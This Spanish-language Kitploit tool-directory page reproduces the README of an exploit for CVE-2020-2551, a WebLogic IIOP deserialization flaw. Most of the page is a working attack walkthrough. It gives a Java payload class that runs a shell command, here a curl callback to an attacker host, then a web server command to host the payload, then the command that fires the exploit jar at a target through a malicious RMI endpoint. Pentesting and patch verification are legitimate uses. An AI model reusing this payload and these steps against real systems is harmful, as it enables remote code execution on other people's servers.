Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Herramientas/GitHubGitHub/y4er/cve-2020-2551
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso RemotoDesarrollo de Payloads
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Ver Repositorio
33678hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-2551

Deserialización de Weblogic IIOP

Entorno de prueba

Weblogic10.3.6+jdk1.6

Paquete jar empaquetado Código de extracción: a6ob

Explotación de la vulnerabilidad

Descargue el paquete jar, luego use marshalsec para iniciar un servicio RMI malicioso, y compile localmente un exp.java

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Compile, en la medida de lo posible, con la misma versión de jdk y la misma biblioteca de dependencias (wlfullclient.jar) que weblogic y luego inicie un servidor web local

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Ejecute el paquete jar desde la línea de comandos

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

El efecto real se muestra en la imagen image

Problemas conocidos

Muchas personas dicen que no logran reproducirlo. Después de leer algunos artículos en línea, descubrí que IIOP tiene problemas con el modo NAT. Hoy encontré que en Xianzhi ya existe https://xz.aliyun.com/t/7498, pueden ir allí ustedes mismos.

Referencias

https://y4er.com/post/weblogic-cve-2020-2551/

Descargar herramienta